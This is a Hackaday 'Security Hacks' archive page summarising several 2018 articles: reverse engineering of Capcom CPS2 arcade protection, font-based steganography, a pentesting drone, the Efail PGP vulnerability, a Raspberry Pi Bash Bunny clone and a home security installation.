Security Hacks

1402 Articles

Cracking The Case Of Capcom’s CPS2 Security

June 6, 2018 by 19 Comments

We love a good deep-dive on a specialized piece of technology, the more obscure the better. You’re getting a sneak peek into a world that, by rights, you were never meant to know even existed. A handful of people developed the system, and as far as they knew, nobody would ever come through to analyze and investigate it to find out how it all went together. But they didn’t anticipate the tenacity of a curious hacker with time on their hands.

[Eduardo Cruz] has done a phenomenal job of documenting one such system, the anti-piracy mechanisms present in the Capcom CPS2 arcade board. He recently wrote in to tell us he’s posted his third and final entry on the system, this time focusing on figuring out what a mysterious six pin header on the CPS2 board did. Hearing from others that fiddling with this header occasionally caused the CPS2 board to automatically delete the game, he knew it must be something important. Hackaday Protip: If there’s a self-destruct mechanism attached to it, that’s probably the cool part.

He followed the traces from the header connector, identified on the silkscreen as C9, back to a custom Capcom IC labeled DL-1827. After decapping the DL-1827 and putting it under the microscope, [Eduardo] made a pretty surprising discovery: it wasn’t actually doing anything with the signals from the header at all. Once the chip is powered up, it simply acts as a pass-through for those signals, which are redirected to another chip: the DL-1525.

[Eduardo] notes that this deliberate attempt at obfuscating which chips are actually connected to different headers on the board is a classic trick that companies like Capcom would use to try to make it harder to hack into their boards. Once he figured out DL-1525 was what he was really after, he was able to use the information he gleaned from his earlier work to piece together the puzzle.

This particular CPS2 hacking journey only started last March, but [Eduardo] has been investigating the copy protection systems on arcade boards since 2014.

[Thanks to Arduino Enigma for the tip.]

Distorted Text Says A Lot

May 31, 2018 by 21 Comments

Getting bounced to a website by scanning a QR code is no longer an exciting feat of technology, but what if you scanned the ingredient list on your granola bar and it went to the company’s page for that specific flavor, sans the matrix code?

Bright minds at the Columbia University in the City of New York have “perturbed” ordinary font characters so the average human eye won’t pick up the changes. Even ordinary OCR won’t miss a beat when it looks at a passage with a hidden message. After all, these “perturbed” glyphs are like a perfectly legible character viewed through a drop of water. When a camera is looking for these secret messages, those minor tweaks speak volumes.

The system is diabolically simple. Each character can be distorted according to an algorithm and a second variable. Changing that second variable is like twisting a distorted lens, or a water drop but the afterimage can be decoded and the variable extracted. This kind of encoding can survive a trip to the printer, unlike a purely digital hidden message.

Hidden messages like these are not limited to passing notes, metadata can be attached to any text and extracted when necessary. Literature could include notes without taking up page space so teachers could include helpful notes and a cell phone could be like an x-ray machine to see what the teacher wants to show. For example, you could define what “crypto” actually means.

Continue reading “Distorted Text Says A Lot”

“Watch Dogs” Inspired Hacking Drone Takes Flight

May 27, 2018 by 19 Comments

They say that life imitates art, which in modern parlance basically means if you see something cool in a video game, movie or TV show, you might be inclined to try and build your own version. Naturally, such things generally come in the form of simple props, perhaps with the occasional embedded LED or noise making circuit. It’s not as if you can really build a phaser from Star Trek or a phone booth that’s bigger on the inside.

But after seeing the hacking quadcopter featured in the video game Watch Dogs 2, [Glytch] was inspired to start work on a real-world version. It doesn’t look much like the drone from the game, but that was never the point. The idea was to see how practical a small flying penetration testing platform is with current technology, and judging by the final build, we’d say he got his answer.

All the flight electronics are off the shelf quadcopter gear. It’s running on a Betaflight OMNIBUS F4 Pro V2 Flight controller with an M8N GPS mounted in the front and controlling the 2006 2400KV motors with a DYS F20A ESC. Interestingly [Glytch] is experimenting with using LG HG2 lithium-ion cells to power the quad rather than the more traditional lithium-polymer pack, though he does mention there are some issues with the voltage curve between the two battery technologies.

But the real star of the show is the payload: a Hak5 Pineapple Nano. As the Pineapple provides a turn-key penetration testing platform on its own, [Glytch] just needed a way to safely carry it and keep it powered. The custom frame keeps it snug, and the 5 Volt Battery Eliminator Circuit (BEC) on the DYS F20A ESC combined with a female USB port allows powering the Pineapple without having to make any hardware modifications.

We’ve seen quadcopters with digital weaponry before, though not nearly as many as you might think. But as even the toy grade quadcopters become increasingly capable, we imagine the airborne hacking revolution isn’t far away.

Continue reading ““Watch Dogs” Inspired Hacking Drone Takes Flight”

Explaining Efail And Why It Isn’t The End Of Email Privacy

May 21, 2018 by 25 Comments

Last week the PGPocalipse was all over the news… Except that, well, it wasn’t an apocalypse.

A team of researchers published a paper(PDF) where they describe how to decrypt a PGP encrypted email via a targeted attack. The research itself is pretty well documented and, from a security researcher perspective, it’s a good paper to read, especially the cryptography parts.

But we here at Hackaday were skeptical about media claims that Efail had broken PGP. Some media reports went as far as recommending everyone turn off PGP encryption on all email clients., but they weren’t able to back this recommendation up with firm reasoning. In fact, Efail isn’t an immediate threat for the vast majority of people simply because an attacker must already have access to an encrypted email to use the exploit. Advising everyone to disable encryption all together just makes no sense.

Aside from the massive false alarm, Efail is a very interesting exploit to wrap your head around. Join me after the break as I walk through how it works, and what you can do to avoid it.

Continue reading “Explaining Efail And Why It Isn’t The End Of Email Privacy”

DIY Pi Zero Pentesting Tool Keeps It Cheap

May 15, 2018 by 14 Comments

It’s a story as old as time: hacker sees cool tool, hacker recoils in horror at the price of said tool, hacker builds their own version for a fraction of the price. It’s the kind of story that we love here at Hackaday, and has been the impetus for countless projects we’ve covered. One could probably argue that, if hackers had more disposable income, we’d have a much harder time finding content to deliver to our beloved readers.

[ Alex Jensen] writes in to tell us of his own tale of sticker shock induced hacking, where he builds his own version of the Hak5 Bash Bunny. His version might be lacking a bit in the visual flair department, but despite coming in at a fraction of the cost, it does manage to pack in an impressive array of features.

This pentesting multitool can act as a USB keyboard, a mass storage device, and even an RNDIS Ethernet adapter. All in an effort to fool the computer you plug it into to let you do something you shouldn’t. Like its commercial inspiration, it features an easy to use scripting system to allow new attacks to be crafted on the fly with nothing more than a text editor. A rudimentary user interface is provided by four DIP switches and light up tactile buttons. These allow you to select which attacks run without needing to hook the device up to a computer first, and the LED lights can give you status information on what the device is doing.

[Alex] utilized some code from existing projects, namely PiBunny and rspiducky, but much of the functionality is of his own design. Detailed instructions are provided on how you can build your own version of this handy hacker gadget without breaking the bank.

Given how small and cheap it is, the Raspberry Pi is gaining traction in the world of covert DIY penetration testing tools. While it might not be terribly powerful, there’s something to be said for a device that’s cheap enough that you don’t mind leaving it at the scene if you’ve got to pull on your balaclava and make a break for it.

PGP Vulnerability Pre-announced By Security Researcher

May 14, 2018 by 30 Comments

From the gaping maw of the infosec Twitterverse comes horrifying news. PGP is broken. How? We don’t know. When will there be any information on this vulnerability? Tomorrow. It’s the most important infosec story of the week, and it’s only Monday. Of course, this vulnerability already has a name. Everyone else is calling it eFail, but I’m calling it Fear, Uncertainty, and Doubt.

Update: eFail site and paper now available. This was released ahead of Tuesday’s planned announcement when the news broke ahead of a press embargo.

Update 2: The report mentions two attacks. The Direct Exfiltration attack wraps the body of a PGP-encrypted email around an image tag. If a mail client automatically decrypts this email, the result will be a request to a URL containing the plaintext of the encrypted email. The second attack only works one-third of the time. Mitigation strategies are to not decrypt email in a client, disable HTML rendering, and in time, update the OpenPGP and S/MIME standards. This is not the end of PGP, it’s a vulnerability warranting attention from those with a very specific use case.

Update 3: Hackaday has published an in-depth explanation of how eFail works which details the scope of the vulnerability.

[Sebastian Schinzel] announced on Twitter today he will be announcing a critical vulnerability in PGP/GPG and S/MIME email encryption. This vulnerability may reveal the plaintext of encrypted emails. There are currently no fixes — but there’s no proof of concept, or any actual publication of this exploit either. The only thing that’s certain: somebody on Twitter said encrypted email is broken.

The EFF has chimed in on this exploit and advises everyone to immediately disable and uninstall tools that automatically decrypt PGP-encrypted email. It also looks like the EFF came up with a great little logo for eFail as well so kudos on that.

While there are no details whatsoever concerning eFail aside from a recommendation to not use PGP, a few members of the community have seen a pre-press of the eFail paper. [Werner Koch] of GnuPG says eFail is simply using HTML as a back channel. If this is true, PGP is still safe; you just shouldn’t use HTML emails. If you really need to read HTML emails, use a proper MIME parser and disallow access to external links. It should be noted that HTML in email is already an attack vector and has been for decades. You don’t need to bring PGP into this.

Should you worry about a vulnerability in PGP and email encryption? Literally no one knows. European security researchers are working on a publication release right now, but other experts in the field who have seen the paper think it’s not a big deal. There is no consensus from experts in the field, and there is no paper available right now. That last point will change in a few hours, but for now eFail just stands for Fear, Uncertainty, and Doubt.

A Home Network, Security System, And A Hidden Room Behind A Bookcase

May 6, 2018 by 33 Comments

Ok, now this is something special. This is a home network and security system that would make just about anyone stop, and with jaw hanging agape, stare, impressed at the “several months of effort” it took [timekillerjay] to install their dream setup. Just. Wow.

Want a brief rundown of the diverse skill set needed to pull this off? Networking, home security, home automation, woodworking, running two thousand feet(!) of cat 6a cable, a fair hand at drywall work for the dozens upon dozens of patches, painting, staining, and — while not a skill, but is definitely necessary — an amazingly patient family.

Ten POE security cameras monitor the premises with audio recording, infrared, and motion detection capabilities. This is on top of magnetic sensors for five doors, and eleven windows that feed back to an ELK M1-Gold security system which effortlessly  coordinates with an Insteon ISY994i smart home hub; this allows for automatic events — such as turning on lights after dark when a door is opened — to occur as [timekillerjay]’s family moves about their home. The ELK also allows [timekillerjay] to control other things around the house — namely the sprinkler system — via relays. [timekillerjay] says he lost track of how many smart switches are scattered throughout his home, but there are definitely 39 network drops that service the premises.

All of the crucial components are hidden in his office, behind a custom bookshelf. Building it required a few clever tricks to disguise the bookshelf for the secret door that it is, as well as selecting components with attention to how much noise they generate — what’s the point of a hidden security system if it sounds like a bunch of industrial fans?

An uninterruptible power supply will keep the entire system running for about 45 minutes if there is a power outage, with the cameras recording and system logging everything all the while. Not trusting the entrance to his vault to something from Batman, he’s also fitted the bookshelf with a 600lb magnetic lock that engages when the system is armed and the door already closed. A second UPS will keep the door secured for 6+ hours if the house loses power. Needless to say, we think this house is well secured.

[Via /r/DIY]